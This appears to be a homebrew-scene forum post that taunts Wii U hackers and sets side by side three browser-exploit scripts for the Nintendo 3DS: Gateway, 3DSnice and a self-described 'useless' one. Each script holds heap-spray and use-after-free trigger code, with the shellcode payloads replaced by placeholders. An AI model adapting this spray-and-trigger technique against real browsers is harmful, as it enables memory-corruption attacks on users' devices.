Script difference, Gateway, 3DSnice and Wii U false

1. Doubt ? Read between the lines than be so dumb and trust people that tease you since years without showing any real move on Wii U... 4 kids that can't even do anything, they can learn all what they want, they struggle in the same point.
2. The old exploit is over, keep moving forward. (Even the NX will be release before you do something)
3. You better find a GF to help you out.
4.  
5. Gateway Script:
6.  
7. <html>
8. <head>
9. <style>
10. body {
11. color:white;
12. background:black;
13. }
14.  
15.  
16. </style>
17. <script>
18. function magicfun(mem, size, v) {
19. var a = new Array(size - 20);
20. nv = v + unescape("%ucccc");
21. for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
22. var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
23.  
24. mem.push(t);
25. }
26.  
27. function dsm(evnt) {
28. var mem = [];
29.  
30. for (var j = 20; j < 430; j++) {
31. magicfun(mem, j, unescape("payload"));
32. }
33. }
34. </script>
35. </head>
36. <body>
37. <h1 align="center">GATEWAY 3DS LOADING...</h1>
38.  
39. </body>
40. </html>
41.  
42. 3DSnice Script (only last few lines similar, learn how to read a script) :
43.  
44. <html>
45. <head>
46. <style> body {color:blue;background:black;} iframe {display:none;} h1 {text-align:center;}
47.  
48. </style>
49. <script>
50. if(parent==window) {
51. window.onload = function() {
52. document.body.innerHTML += "<iframe src='#' />";
53. };
54. } else if(navigator.userAgent.indexOf('Nintendo 3DS') != -1) {
55. var nb = 0;
56. window.onload = function () {
57. f = window.frameElement;
58. p = f.parentNode;
59. var o = document.createElement("object");
60. o.addEventListener('beforeload', function () {
61. if (++nb == 1) {
62. p.addEventListener('DOMSubtreeModified', parent.dsm, false);
63. } else if (nb == 2) {
64. p.removeChild(f);
65. }
66. }, false);
67. document.body.appendChild(o);
68. };
69. }
70. function magicfun(mem, size, v) {
71. var a = new Array(size - 20);
72. nv = v + unescape("%ucccc");
73. for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
74. var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
75.  
76. mem.push(t);
77. }
78.  
79. function dsm(e) {
80. var mem = [];
81. for (var j = 20; j < 430; j++)
82. magicfun(mem, j, unescape("payload"));
83.  
84. }
85.  
86. </script>
87. </head>
88. <body>
89. </body>
90. </html>
91.  
92. Useless exploit (oops shitty heap):
93. <html>
94. <head>
95. <script>
96. function sprayOne(mem, size, v) {
97. var a = new Uint32Array(size - 20);
98. for (var j = 0; j < a.length; j++) a[j] = v;
99. var t = document.createTextNode(String.fromCharCode.apply(null, new Uint32Array(a)));
100. mem.push(t);
101. }
102. function sprayInc(n) {
103. var str = unescape(“wrong code”);
104.  
105. var h1 = [];
106. h1[0] = str.substring(0, str.length);
107.  
108. for (i = 1; i <= n; i++)
109. h1[i] = unescape(h1[0]);
110.  
111. return h1;
112. }
113.  
114. function sprayCode(n) {
115. var str = unescape(“wrong code”);
116.  
117. var h1 = [];
118. h1[0] = str.substring(0, str.length);
119.  
120. for (i = 1; i <= n; i++)
121. h1[i] = unescape(h1[0]);
122.  
123. return h1;
124. }
125.  
126. function dsm(evnt) {
127. // spray
128. var mem = [];
129. for (var j = 20; j < 2048; j++) sprayOne(mem, j, 0x1dd7b814);
130. }
131. var pointer = sprayInc(25000);
132. var code = sprayCode(300);
133. </script>
134. </head>
135. <body>
136. <iframe src="frame.html"></iframe>
137. </body>
138. </html>